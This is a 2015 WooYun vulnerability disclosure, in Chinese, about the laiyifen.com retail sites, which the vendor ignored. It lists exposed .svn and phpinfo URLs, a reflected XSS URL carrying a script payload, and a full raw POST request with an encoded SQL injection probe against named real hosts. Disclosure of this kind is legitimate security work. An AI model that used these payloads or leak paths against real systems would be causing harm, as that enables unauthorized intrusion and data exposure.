当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100474

漏洞标题:来伊份某站SQL注入等多处安全漏洞

相关厂商:laiyifen.com

漏洞作者: 路人甲

提交时间:2015-03-10 11:58

修复时间:2015-03-15 12:00

公开时间:2015-03-15 12:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-10: 细节已通知厂商并且等待厂商处理中
2015-03-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

注入,跨站,信息泄露

详细说明:

信息泄露:
http://images.laiyifen.com:80/themes/laiyifen2/images/css/.svn/entries
http://images.laiyifen.com:80/themes/laiyifen2/images/js/.svn/entries
http://touch.laiyifen.com:80/.svn/entries
http://images.laiyifen.com:80/themes/laiyifen2/images/css/.svn/entries
http://touch.laiyifen.com:80/media/.svn/entries
http://wx.laiyifen.com:80/.svn/entries
http://wx.laiyifen.com:80/html/pc/images/.svn/entries

L2.png


http://oim.laiyifen.com:80/info.php
http://wx.laiyifen.com/info.php

L1.png


xss:
http://eip.laiyifen.com/oa/lyf/whln.nsf/myview?openform&count=10&view=vwPubliced%27%27%3E%22%3E%3C/title%3E%3C/textarea%3E%3C/script%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E

xss.png


注入:

POST http://laiyifen.com/index.php/product-gnotify.html HTTP/1.1
Host: laiyifen.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.127/secinfo/poc/report.tools.php?act=post&url=http%3A%2F%2Flaiyifen.com%3A80%2Findex.php%2Fproduct-gnotify.html%3Fgoods%255Bnum%255D%3D1%26goods%255Bgoods_id%255D%3D1264%26goods%255Bpmt_id%255D%3D%AB%AB%AB%AB%AB%AB%AB%AB%FE%26goods%255Bproduct_id%255D%3D1373-0
Cookie: 53gid0=52867575601; 53gid1=52867575601; 53gid2=52867575601; visitor_type=old; 53uvid=1; 53kf_72081366_keyword=http%3A%2F%2F192.168.1.127%2Fsecinfo%2Fpoc%2Freport.tools.php%3Fact%3Dpost%26url%3Dhttp%253A%252F%252Flaiyifen.com%253A80%252Findex.php%252Fproduct-gnotify.html%253Fgoods%25255Bnum%25255D%253D1%2526goods%25255Bgoods_id%25255D%253D1264%2526goods%25255Bpmt_id%25255D%253D%25AB%25AB%25AB%25AB%25AB%25AB%25AB%25AB%25FE%2526goods%25255Bproduct_id%25255D%253D1373-0; kf_72081366_keyword_ok=1; onliner_zdfq72081366=0; _ga=GA1.2.159723741.1425868557; Hm_lvt_39275d51dc9886fb63632959ca583081=1425868557,1425868671,1425950675,1425953293; __utma=9760808.159723741.1425868557.1425950675.1425953293.3; __utmz=9760808.1425953293.3.3.utmcsr=192.168.1.127|utmccn=(referral)|utmcmd=referral|utmcct=/secinfo/poc/report.tools.php; acta=%7B%22actn%22%3A%7B%22500223%22%3A%5B%226729838019376085998%3E1%3E1425953204807%3E1%3E1425953204807%3E6720830733351378013%3E1425868468781%22%2C1441505293368%5D%7D%2C%22acti%22%3A%7B%22500223%22%3A%5B%22142586855684636254%22%2C1441420556846%5D%7D%2C%22acts%22%3A%7B%22500223%22%3A%5B%224%3E192.168.1.127%22%2C1441502675632%5D%7D%2C%22actmapping%22%3A%7B%220%22%3A%5B1%2C1428545293374%5D%7D%7D; Hm_lvt_0642ec06b0edd997389083e09f2399fb=1425868557,1425868671,1425950676,1425953293; laiyifen_cookie=536871690.20480.0000; vary=1a7a3797b8098fff6687cf0a7cbb5821f966b1278658678f6c0bb7b3a7dd1b0e; __utmc=9760808; Hm_lpvt_39275d51dc9886fb63632959ca583081=1425953293; Hm_lpvt_0642ec06b0edd997389083e09f2399fb=1425953293; _gat=1; __utmb=9760808.1.10.1425953293; __utmt=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 170
goods%5Bnum%5D=1&goods%5Bgoods_id%5D=1264&goods%5Bpmt_id%5D=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&goods%5Bproduct_id%5D=1373-0


1.png


数据库:

2.png

漏洞证明:

见上

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-03-15 12:00

厂商回复:

最新状态:

暂无